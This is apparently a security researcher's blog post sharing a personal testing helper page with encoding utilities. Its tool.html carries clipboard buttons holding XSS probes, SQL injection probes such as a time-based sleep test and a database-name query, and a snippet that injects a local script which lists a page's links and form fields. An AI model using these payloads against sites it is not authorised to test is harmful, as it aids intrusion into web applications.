guimaizi’s blog

从前


title: 一个辅助小工具 url: 394.html id: 394 comments: false categories:

  • 安全/代码 date: 2019-01-20 21:17:59 tags:

tool.html

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<style>
body{ margin:0 auto; width:600px; height:100px}
#log{width:600px}
#text{width:600px} 
</style>
<script src='https://code.jquery.com/jquery-3.3.1.js'></script>
<script src='/script/tool.js'></script>
<script>
document.title='Tool';
$(document).ready(function(){
  $("#decodeURI").click(function(){
    str=$("#text").val();
    $("#log").val(decodeURIComponent(str));
  });
  $("#encodeURI").click(function(){
    str=$("#text").val();
    $("#log").val(encodeURIComponent(str));
  });
  $("#Base64_encode").click(function(){
    str=$("#text").val();
    $("#log").val(Base64.encode(str));
  });
  $("#Base64_decode").click(function(){
    str=$("#text").val();
    $("#log").val(Base64.decode(str));
  });
  $("#random_key").click(function(){
    $("#log").val(randomWord(false, 12)+'_');
  });
    $("#decToHex").click(function(){
    str=$("#text").val();
    $("#log").val(decToHex(str));
  });
    $("#hexToDec").click(function(){
    str=$("#text").val();
    $("#log").val(hexToDec(str));
  });
    $("#stringToHex16").click(function(){
    str=$("#text").val();
    $("#log").val(stringtoHex(str));
  });
    $("#hexToString16").click(function(){
    str=$("#text").val();
    $("#log").val(hextoString(str));
  });
    $("#stringToEntity").click(function(){
    str=$("#text").val();
    $("#log").val(stringToEntity(str));
  });
    $("#entityToString").click(function(){
    str=$("#text").val();
    $("#log").val(entityToString(str));
  });
    $("#json_format").click(function(){
    str=$("#text").val();
    $("#log").val(formatJson(str));
  });
    $("#click_up").click(function(){
    str=$("#log").val();
    $("#text").val(str);
  });
});
</script>
</head>
<body><div class="div"> 
Tool 
</div>
<div>
<textarea id="text" rows="20" cols="60">
</textarea>
</div>
<div class="button">
<table cellpadding="5">
  <tr>
    <th><button id="encodeURI">encodeURI</button></th>
    <th><button id="Base64_encode">Base64_encode</button></th>
    <th><button id="decToHex">jsdecToHex</button></th>
    <th><button id="stringToHex16">stringToHex16</button></th>
    <th><button id="stringToEntity">stringToEntity</button></th>
  </tr>
  <tr>
    <th><button id="decodeURI">decodeURI</button></th>
    <th><button id="Base64_decode">Base64_decode</button></th>
    <th><button id="hexToDec">jshexToDec</button></th>
    <th><button id="hexToString16">hexToString16</button></th>
    <th><button id="entityToString">entityToString</button></th>
  </tr>
</table>
生成随机8位数key:<button id="random_key">random_key</button><br/>json格式化:<button id="json_format">json_format</button>
<br/>
xss剪贴板:<br/>
<button class="btn" data-clipboard-text="&#100;&#97;&#115;&#100;&#97;&#103;&#117;&#105;&#109;&#97;&#105;&#122;&#105;&#120;&#115;&#115;&#115;&#115;&#34;&#39;&#47;&#62;">
dasdaguimaizixssss"'/>
</button>
<button class="btn" data-clipboard-text="location">
location
</button>
<button class="btn" data-clipboard-text="javascript:alert(1)">
javascript:alert(1)
</button>
<button class="btn" data-clipboard-text="<img src=a onerror=alert()>">
&#x3c;&#x69;&#x6d;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x61;&#x20;&#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x29;&#x3e;
</button>
<br/>
sql剪贴板:<br/>
<button class="btn" data-clipboard-text="and 1=1">
and 1=1
</button>
<button class="btn" data-clipboard-text="and sleep(5)-- ">
and sleep(5)--  
</button>
<button class="btn" data-clipboard-text="' |(select database());# ">
' |(select database());#
</button><br/>
常用剪贴板:<br/>
<button class="btn" data-clipboard-text="http://www.guimaizi.com/">
http://www.guimaizi.com/
</button>
<button class="btn" data-clipboard-text="var script = document.createElement('script');
script.setAttribute('src','http://127.0.0.1/vul.js');
document.body.appendChild(script);">
inj js
</button>
</div>
<br/><hr/>
<button id="click_up">get_up</button></br>
<textarea id="log" rows="20" cols="60">
</textarea>
</body>
<script src="https://unpkg.com/[email protected]/dist/clipboard.min.js"></script>
<script>
var clipboard = new ClipboardJS('.btn');

clipboard.on('success', function(e) {
    /*console.info('Action:', e.action);
    console.info('Text:', e.text);
    console.info('Trigger:', e.trigger);
    */

    e.clearSelection();
});

clipboard.on('error', function(e) {
    console.error('Action:', e.action);
    console.error('Trigger:', e.trigger);
});
</script>
</html>

tool.js

//Base64
var Base64 = {

    // private property
    _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

    // public method for encoding
    encode: function(input) {
        var output = "";
        var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
        var i = 0;

        input = Base64._utf8_encode(input);

        while (i < input.length) {

            chr1 = input.charCodeAt(i++);
            chr2 = input.charCodeAt(i++);
            chr3 = input.charCodeAt(i++);

            enc1 = chr1 >> 2;
            enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
            enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
            enc4 = chr3 & 63;

            if (isNaN(chr2)) {
                enc3 = enc4 = 64;
            } else if (isNaN(chr3)) {
                enc4 = 64;
            }

            output = output + this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) + this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

        }

        return output;
    },

    // public method for decoding
    decode: function(input) {
        var output = "";
        var chr1, chr2, chr3;
        var enc1, enc2, enc3, enc4;
        var i = 0;

        input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

        while (i < input.length) {

            enc1 = this._keyStr.indexOf(input.charAt(i++));
            enc2 = this._keyStr.indexOf(input.charAt(i++));
            enc3 = this._keyStr.indexOf(input.charAt(i++));
            enc4 = this._keyStr.indexOf(input.charAt(i++));

            chr1 = (enc1 << 2) | (enc2 >> 4);
            chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
            chr3 = ((enc3 & 3) << 6) | enc4;

            output = output + String.fromCharCode(chr1);

            if (enc3 != 64) {
                output = output + String.fromCharCode(chr2);
            }
            if (enc4 != 64) {
                output = output + String.fromCharCode(chr3);
            }

        }

        output = Base64._utf8_decode(output);

        return output;

    },

    // private method for UTF-8 encoding
    _utf8_encode: function(string) {
        string = string.replace(/\r\n/g, "\n");
        var utftext = "";

        for (var n = 0; n < string.length; n++) {

            var c = string.charCodeAt(n);

            if (c < 128) {
                utftext += String.fromCharCode(c);
            } else if ((c > 127) && (c < 2048)) {
                utftext += String.fromCharCode((c >> 6) | 192);
                utftext += String.fromCharCode((c & 63) | 128);
            } else {
                utftext += String.fromCharCode((c >> 12) | 224);
                utftext += String.fromCharCode(((c >> 6) & 63) | 128);
                utftext += String.fromCharCode((c & 63) | 128);
            }

        }

        return utftext;
    },

    // private method for UTF-8 decoding
    _utf8_decode: function(utftext) {
        var string = "";
        var i = 0;
        var c = c1 = c2 = 0;

        while (i < utftext.length) {

            c = utftext.charCodeAt(i);

            if (c < 128) {
                string += String.fromCharCode(c);
                i++;
            } else if ((c > 191) && (c < 224)) {
                c2 = utftext.charCodeAt(i + 1);
                string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                i += 2;
            } else {
                c2 = utftext.charCodeAt(i + 1);
                c3 = utftext.charCodeAt(i + 2);
                string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                i += 3;
            }

        }

        return string;
    }

}
function randomWord(randomFlag, min, max){
    var str = "",
        range = min,
        arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','_'];

    // 随机产生
    if(randomFlag){
        range = Math.round(Math.random() * (max-min)) + min;
    }
    for(var i=0; i<range; i++){
        pos = Math.round(Math.random() * (arr.length-1));
        str += arr[pos];
    }
    return str;
}
var decToHex = function(str) {
  var res=[];
  for(var i=0;i < str.length;i++)
    res[i]=("00"+str.charCodeAt(i).toString(16)).slice(-4);
  return "\\u"+res.join("\\u");
}
var hexToDec = function(str) {
  str=str.replace(/\\/g,"%");
  return unescape(str);
}

var stringtoHex=function (str) {
    var val = "";
    for (var i = 0; i < str.length; i++) {
      if (val == "")
        val = str.charCodeAt(i).toString(16);
      else
        val += str.charCodeAt(i).toString(16);
    }
    //val += "0a"
    return val
}
var hextoString=function (hex) {
    var arr = hex.split("")
    var out = ""
    for (var i = 0; i < arr.length / 2; i++) {
      var tmp = "0x" + arr[i * 2] + arr[i * 2 + 1]
      var charValue = String.fromCharCode(tmp);
      out += charValue
    }
    return out
  }
var stringToEntity=function(str,radix){
  let arr=str.split('')
  radix=radix||0
  let tmp=arr.map(item=>
`&#${(radix?'x'+item.charCodeAt(0).toString(16):item.charCodeAt(0))};`).join('')
  console.log(`'${str}' 转实体为 '${tmp}'`)
  return tmp
}
var entityToString=function(entity){
  let entities=entity.split(';')
  entities.pop()
  let tmp=entities.map(item=>String.fromCharCode(
  item[2]==='x'?parseInt(item.slice(3),16):parseInt(item.slice(2)))).join('')
  console.log(`'${entity}' 转字符串为 '${tmp}'`)
  return tmp
}

//格式化代码函数,已经用原生方式写好了不需要改动,直接引用就好
var formatJson = function (json) {
        var formatted = '',     //转换后的json字符串
            padIdx = 0,         //换行后是否增减PADDING的标识
            PADDING = '    ';   //4个空格符
        /**
         * 将对象转化为string
         */
        if (typeof json !== 'string') {
            json = JSON.stringify(json);
        }
        /** 
         *利用正则类似将{'name':'ccy','age':18,'info':['address':'wuhan','interest':'playCards']}
         *---> \r\n{\r\n'name':'ccy',\r\n'age':18,\r\n
         *'info':\r\n[\r\n'address':'wuhan',\r\n'interest':'playCards'\r\n]\r\n}\r\n
         */
        json = json.replace(/([\{\}])/g, '\r\n$1\r\n')
                    .replace(/([\[\]])/g, '\r\n$1\r\n')
                    .replace(/(\,)/g, '$1\r\n')
                    .replace(/(\r\n\r\n)/g, '\r\n')
                    .replace(/\r\n\,/g, ',');
        /** 
         * 根据split生成数据进行遍历,一行行判断是否增减PADDING
         */
       (json.split('\r\n')).forEach(function (node, index) {
            var indent = 0,
                padding = '';
            if (node.match(/\{$/) || node.match(/\[$/)) indent = 1;
            else if (node.match(/\}/) || node.match(/\]/))  padIdx = padIdx !== 0 ? --padIdx : padIdx;
            else    indent = 0;
            for (var i = 0; i < padIdx; i++)    padding += PADDING;
            formatted += padding + node + '\r\n';
            padIdx += indent;
            console.log('index:'+index+',indent:'+indent+',padIdx:'+padIdx+',node-->'+node);
        });
        return formatted;
};

vul.js

window.onload=function (){
    function removeDuplicatedItem(arr) {
      var hash=[];
      for (var i = 0; i < arr.length; i++) {
         if(hash.indexOf(arr[i])==-1){
          hash.push(arr[i]);
         }
      }
      return hash;
    }
    /*** a href标签 ***/
    var urls    =   new Array();    
    var atags   =   document.getElementsByTagName("a"); 
    for(var i=0;i<atags.length;i++){    
        if  (atags[i].getAttribute("href")){    
        urls[i] =   atags[i].getAttribute("href")+' --- '+atags[i].innerText;   
        }
    }   
    console.log(removeDuplicatedItem(urls));
    /*** iframe src ***/
    var iframe_src=new  Array();
    var atags   =   document.getElementsByTagName("iframe");    
    for(var i=0;i<atags.length;i++){    
        if  (atags[i].getAttribute("src")){ 
        iframe_src[i]   =   atags[i].getAttribute("src")    
        }
    }   
    console.log(removeDuplicatedItem(iframe_src));
    /***--form --***/
    for(var i=0;i<document.forms.length;i++){   
        form    =   document.forms[i];  
        console.log(form.method,    form.action)    
        for(var j=0;j<form.length;j++){ 
                input   =   form[j];    
                console.log(input.nodeName, input.type, input.name);    
        }   
}
}();